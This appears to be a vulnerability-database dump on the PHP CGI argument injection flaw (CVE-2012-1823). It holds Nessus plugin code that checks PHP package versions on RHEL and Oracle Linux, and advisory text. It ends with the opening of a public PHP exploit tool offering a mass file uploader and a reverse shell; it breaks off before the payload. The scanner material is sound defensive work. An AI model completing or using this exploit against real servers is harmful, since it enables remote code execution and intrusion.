reference:\"php-mbstring-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-mbstring-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-mbstring-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-mbstring-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-mysql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-mysql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-mysql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-mysql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-mysql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-mysql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-odbc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-odbc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-odbc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-odbc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-odbc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-odbc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-pdo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-pdo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-pdo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-pdo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-pdo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-pdo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-pgsql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-pgsql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-pgsql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-pgsql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-pgsql-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-pgsql-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-process-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-process-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-process-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-process-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-process-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-process-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-pspell-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-pspell-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-pspell-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-pspell-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-pspell-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-pspell-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-recode-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-recode-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-recode-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-recode-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-recode-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-recode-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-snmp-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-snmp-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-snmp-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-snmp-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-snmp-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-snmp-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-soap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-soap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-soap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-soap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-soap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-soap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-tidy-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-tidy-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-tidy-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-tidy-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-tidy-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-tidy-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-xml-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-xml-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-xml-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-xml-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-xml-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-xml-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-xmlrpc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-xmlrpc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-xmlrpc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-xmlrpc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-zts-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-zts-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-zts-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-zts-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-zts-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-zts-5.3.2-6.el6_0.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:11:32", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0546 :\n\nUpdated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "ORACLELINUX_ELSA-2012-0546.NASL", "href": "https://www.tenable.com/plugins/nessus/68524", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : php (ELSA-2012-0546)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0546 and \n# Oracle Linux Security Advisory ELSA-2012-0546 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68524);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/30 10:58:17\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_bugtraq_id(53388);\n script_xref(name:\"RHSA\", value:\"2012:0546\");\n\n script_name(english:\"Oracle Linux 5 / 6 : php (ELSA-2012-0546)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0546 :\n\nUpdated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration in Red Hat\nEnterprise Linux 5 and 6 using the PHP module for Apache httpd to\nhandle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-May/002792.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-May/002794.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"php-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-bcmath-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-cli-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-common-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-dba-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-devel-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-gd-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-imap-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ldap-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mbstring-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mysql-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ncurses-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-odbc-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pdo-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pgsql-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-snmp-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-soap-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-xml-5.1.6-34.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-xmlrpc-5.1.6-34.el5_8\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"php-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-bcmath-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-cli-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-common-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-dba-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-devel-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-embedded-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-enchant-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-gd-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-imap-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-intl-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-ldap-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-mbstring-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-mysql-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-odbc-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-pdo-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-pgsql-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-process-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-pspell-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-recode-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-snmp-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-soap-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-tidy-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-xml-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-xmlrpc-5.3.3-3.el6_2.8\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"php-zts-5.3.3-3.el6_2.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "description": "&lt;?php\r\n\r\n######################################### www.bugreport.ir \r\n########################################\r\n#\r\n# Title: PHP CGI Argument Injection Remote Exploit \r\nV0.3 - PHP Version\r\n# Vendor: http://www.php.net\r\n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2\r\n# Exploitation: Remote\r\n# Original Advisory: \r\nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\r\n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm\r\n# CVE: CVE-2012-1823\r\n# Coded By: Mostafa Azizi &#40;admin[@]0-Day[dot]net&#41;\r\n###################################################################################################\r\n\r\n/* This tool may be used for legal purposes only. Users take full \r\nresponsibility for any actions performed using this tool.\r\nThe author accepts no liability for damage caused by this tool. If \r\nthese terms are not acceptable to you, then do not use this tool.*/\r\n\r\nerror_reporting&#40;0&#41;;\r\nini_set&#40;&quot;max_execution_time&quot;,0&#41;;\r\nini_set&#40;&quot;default_socket_timeout&quot;, 10&#41;;\r\nob_implicit_flush &#40;1&#41;;\r\n\r\necho&#39;&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;PHP CGI Argument Injection Remote Exploit&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#5E767E&quot;&gt;PHP CGI Argument \r\nInjection&lt;/font&gt;&lt;/p&gt;\r\n&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;3&quot; color=&quot;#4E8975&quot;&gt;Coded by: Mostafa \r\nAzizi &#40;admin[@]0-Day[dot]net&#41;&lt;/font&gt;&lt;/p&gt;\r\n&lt;body bgcolor=&quot;#00000&quot;&gt;\r\n&lt;table align=&quot;center&quot; border=&quot;5&quot;&gt;\r\n&lt;tr&gt;\r\n &lt;th&gt;&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#8BB381&quot;&gt;Mass File \r\nUploader&lt;/font&gt;&lt;/p&gt;\r\n&lt;/th&gt;\r\n&lt;th&gt;&lt;/th&gt;\r\n &lt;th&gt;&lt;p align=&quot;center&quot;&gt;&lt;font size=&quot;4&quot; color=&quot;#8BB381&quot;&gt;Reverse \r\nShell&lt;/font&gt;&lt;/p&gt;\r\n&lt;/th&gt;\r\n &lt;/tr&gt;\r\n&lt;tr&gt;\r\n &lt;td&gt;&lt;form name=&quot;form1&quot; action=&quot;&#39;.$SERVER[PHP_SELF].&#39;&quot; \r\nenctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;\r\n &lt;/br&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt;Please specify a file to \r\nscan: &lt;/font&gt;&lt;/br&gt;&lt;input type=&quot;file&quot; name=&quot;listfile&quot; \r\nsize=&quot;40&quot;&gt;&lt;font color=&quot;#FF0000&quot;&gt; * &lt;/font&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt;Please specify a file to \r\nupload: &lt;/font&gt;&lt;/br&gt;&lt;input type=&quot;file&quot; name=&quot;datafile&quot; \r\nsize=&quot;40&quot;&gt;&lt;font color=&quot;#FF0000&quot;&gt; * &lt;/font&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; specify a port &#40;default is 80&#41;: \r\n &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;port&quot; size=&quot;20&quot;&gt;&lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Proxy &#40;ip:port&#41;: \r\n &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;proxy&quot; size=&quot;20&quot;&gt;&lt;span 